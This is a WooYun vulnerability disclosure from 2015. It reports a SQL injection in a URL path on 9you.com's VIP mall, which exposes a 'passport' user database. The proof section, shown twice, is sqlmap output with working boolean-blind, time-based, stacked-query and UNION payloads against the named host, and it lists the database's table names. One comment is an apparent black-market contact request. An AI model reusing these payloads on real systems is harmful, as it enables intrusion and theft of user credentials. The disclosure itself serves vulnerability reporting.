当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162489

漏洞标题:久游网伪静态SQL注入涉及643万用户账户密码信息

相关厂商:久游网

漏洞作者: 小川

提交时间:2015-12-18 17:32

修复时间:2016-02-01 19:48

公开时间:2016-02-01 19:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-18: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

一提到九游,我的心里就哼着:苍茫的天涯是我的爱......

详细说明:

ragecomic.png

漏洞证明:

web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] information_schema
[*] passport
[*] test
[*] vip
[*] vip_new
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND 7940=7940 AND (6013=6013.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76);(SELECT * FROM (SELECT(SLEEP(5)))WpLQ)#.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND (SELECT * FROM (SELECT(SLEEP(5)))Lgns) AND (2756=2756.html
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786a71,0x506b5059486c4e537979,0x7176627171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- .html
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] information_schema
[*] passport
[*] test
[*] vip
[*] vip_new
Database: passport
[68 tables]
+-------------------------+
| au_cdk |
| au_cdk_type |
| au_itemsend |
| disk_usage_master |
| disk_usage_slave |
| email_sign |
| fast_reglog |
| get_username_paycard |
| get_username_registinfo |
| gmtools_account_sign |
| log_adult |
| log_appeal |
| log_appeal_rest |
| log_aupwd |
| log_aupwd_rest |
| log_email |
| log_email_yahoo |
| log_getpasswd |
| log_idcard |
| log_idcard_email |
| log_info_speed |
| log_login |
| log_matrixcard_lost |
| log_matrixcard_replace |
| log_matrixcard_set |
| log_matrixcard_unbind |
| log_nickname_speed |
| log_password_email |
| log_password_modify |
| log_password_vipcode |
| log_profile |
| log_propertylockreset |
| log_provip |
| log_provip_rest |
| log_qa |
| log_regist_reset |
| log_securecode |
| log_sim |
| log_token |
| log_username_mobile |
| lx_code_resend_log |
| lx_code_send_cpl |
| lx_code_send_log |
| lx_fullcode_limit |
| lx_ticket |
| m818_user_bind |
| m818_user_bind_log |
| matrixcard_info |
| mobile_checkcode |
| mobile_checkcode_vip |
| mobile_sendmsg |
| mobile_user_bind |
| mobile_user_bind_email |
| mobile_user_bind_log |
| mobile_user_bind_regist |
| ms_mobile_user |
| sim_bind |
| sim_lost |
| slave_check |
| sleep_user_au_log |
| sleep_user_pwd |
| token_info |
| token_unbind |
| user_bind_ydcy |
| user_bind_ydcy_err |
| user_login_info |
| voidnickname |
| ydcy_addstorage_log |
+-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND 7940=7940 AND (6013=6013.html
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76);(SELECT * FROM (SELECT(SLEEP(5)))WpLQ)#.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) AND (SELECT * FROM (SELECT(SLEEP(5)))Lgns) AND (2756=2756.html
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: http://uhg.9you.com:80/vip/mall/index/game_id/76) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786a71,0x506b5059486c4e537979,0x7176627171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- .html
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] information_schema
[*] passport
[*] test
[*] vip
[*] vip_new
Database: passport
[68 tables]
+-------------------------+
| au_cdk |
| au_cdk_type |
| au_itemsend |
| disk_usage_master |
| disk_usage_slave |
| email_sign |
| fast_reglog |
| get_username_paycard |
| get_username_registinfo |
| gmtools_account_sign |
| log_adult |
| log_appeal |
| log_appeal_rest |
| log_aupwd |
| log_aupwd_rest |
| log_email |
| log_email_yahoo |
| log_getpasswd |
| log_idcard |
| log_idcard_email |
| log_info_speed |
| log_login |
| log_matrixcard_lost |
| log_matrixcard_replace |
| log_matrixcard_set |
| log_matrixcard_unbind |
| log_nickname_speed |
| log_password_email |
| log_password_modify |
| log_password_vipcode |
| log_profile |
| log_propertylockreset |
| log_provip |
| log_provip_rest |
| log_qa |
| log_regist_reset |
| log_securecode |
| log_sim |
| log_token |
| log_username_mobile |
| lx_code_resend_log |
| lx_code_send_cpl |
| lx_code_send_log |
| lx_fullcode_limit |
| lx_ticket |
| m818_user_bind |
| m818_user_bind_log |
| matrixcard_info |
| mobile_checkcode |
| mobile_checkcode_vip |
| mobile_sendmsg |
| mobile_user_bind |
| mobile_user_bind_email |
| mobile_user_bind_log |
| mobile_user_bind_regist |
| ms_mobile_user |
| sim_bind |
| sim_lost |
| slave_check |
| sleep_user_au_log |
| sleep_user_pwd |
| token_info |
| token_unbind |
| user_bind_ydcy |
| user_bind_ydcy_err |
| user_login_info |
| voidnickname |
| ydcy_addstorage_log |
+-------------------------+

修复方案:

天地良心,绝未脱裤,至于vip库里的信息,我都没看,intval处理下吧

版权声明:转载请注明来源 小川@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-18 22:53

厂商回复:

扫描器还是手工啊?感觉屌屌的,这都被你找到了,
必须20分啊

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-18 17:40 | 牛 小 帅 ( 普通白帽子 | Rank:1015 漏洞数:233 | 1.乌云最帅的男人 ...)

    低调站1楼

  2. 2015-12-18 17:53 | px1624 ( 普通白帽子 | Rank:1072 漏洞数:181 | px1624)

    有神器就是叼!

  3. 2015-12-18 19:14 | k0_pwn ( 实习白帽子 | Rank:55 漏洞数:12 | 专注且自由)

    年底了,川神的暴漫又要更新了

  4. 2015-12-18 22:22 | 菜菜 ( 实习白帽子 | Rank:83 漏洞数:7 | cnidc.hk:500:D5B9985DFBA5FE8A050A39C249C...)

    川神

  5. 2015-12-19 09:26 | 命运 ( 路人 | Rank:3 漏洞数:2 | 我是来乌云秀智商下限的~~)

    求早日公开看暴漫

  6. 2015-12-19 10:27 | hecate ( 普通白帽子 | Rank:722 漏洞数:109 | ®高级安全工程师 | WooYun认证√)

    x站x多了,你自然就能感觉到哪里有注入

  7. 2015-12-19 14:21 | kevinchowsec ( 实习白帽子 | Rank:51 漏洞数:16 | 周凯文,信息安全爱好者。)

    厂商无限惆怅,对唱:绵绵的青山脚下花正开...

  8. 2015-12-19 14:59 | 小川 认证白帽子 ( 核心白帽子 | Rank:1451 漏洞数:223 | 一个致力要将乌云变成搞笑论坛的男人)

    @kevinchowsec 什么样的歌谣是最呀最摇摆?

  9. 2015-12-19 15:24 | Mr.Wang ( 路人 | 还没有发布任何漏洞 | 黑与白的对立中,寻求突破。)

    哥们,加我q一下,2573465610,有事情要洽谈。

  10. 2015-12-19 17:35 | whynot ( 普通白帽子 | Rank:553 漏洞数:100 | 为你解冻冰河 为你放弃世界有何不可)

    @小川 又一期王尼玛又开始了 so diao

  11. 2015-12-19 22:55 | Tioyer ( 实习白帽子 | Rank:34 漏洞数:10 | 初来乍到,请各位大牛多多指教!)

    川神求qq联系方式

  12. 2015-12-20 19:05 | sauren ( 实习白帽子 | Rank:88 漏洞数:27 | 天天打DOTA,快乐你我他~)

    我是来看川神暴漫的

  13. 2015-12-25 14:41 | 衣其 ( 路人 | Rank:8 漏洞数:2 | 菜鸟一枚)

    关注一下看更新

  14. 2016-01-07 23:01 | px1624 ( 普通白帽子 | Rank:1072 漏洞数:181 | px1624)

    新浪的扫描器叼爆了

  15. 2016-01-08 14:27 | 路人毛 ( 实习白帽子 | Rank:64 漏洞数:25 | ../)

    @Mr.Wang 洽谈你麻痹~黑产商人